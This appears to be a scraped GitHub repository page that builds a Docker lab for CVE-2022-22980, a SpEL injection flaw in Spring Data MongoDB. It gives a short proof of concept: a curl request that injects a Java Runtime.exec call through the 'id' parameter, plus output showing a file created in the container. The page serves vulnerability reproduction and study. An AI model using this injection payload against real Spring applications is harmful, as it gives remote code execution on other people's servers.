Spring-Data-Mongodb-Example

CVE-2022-22980环境

Build docker environment

docker build  -t mongo .
docker run -dit -p 6666:6666 mongo

Poc

➜  Spring-Data-Mongodb-Example git:(main) curl 0:6666/v1/user/get -d 'id=T(java.lang.Runtime).getRuntime().exec("touch /tmp/aaaa")'
{"timestamp":"2022-07-14T01:54:10.828+00:00","status":500,"error":"Internal Server Error","path":"/v1/user/get"}
➜  Spring-Data-Mongodb-Example git:(main) docker exec -it 3a ls -la /tmp
total 4
drwxrwxrwt    5 root     root           123 Jul 14 01:54 .
drwxr-xr-x   19 root     root          4096 Jul 14 01:53 ..
-rw-r--r--    1 root     root             0 Jul 14 01:54 aaaa

Name		Name	Last commit message	Last commit date
Latest commit History 8 Commits
src/main		src/main
Dockerfile		Dockerfile
README.md		README.md
mongodb.ql		mongodb.ql
mvnw		mvnw
mvnw.cmd		mvnw.cmd
pom.xml		pom.xml
springdatamongodb_spel.ql		springdatamongodb_spel.ql

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

src/main

src/main

Dockerfile

Dockerfile

README.md

README.md

mongodb.ql

mongodb.ql

mvnw

mvnw

mvnw.cmd

mvnw.cmd

pom.xml

pom.xml

springdatamongodb_spel.ql

springdatamongodb_spel.ql

Repository files navigation

Spring-Data-Mongodb-Example

Build docker environment

Poc

About

Releases

Packages

Languages

kuron3k0/Spring-Data-Mongodb-Example

Folders and files

Latest commit

History

Repository files navigation

Spring-Data-Mongodb-Example

Build docker environment

Poc

About

Resources

Stars

Watchers

Forks

Languages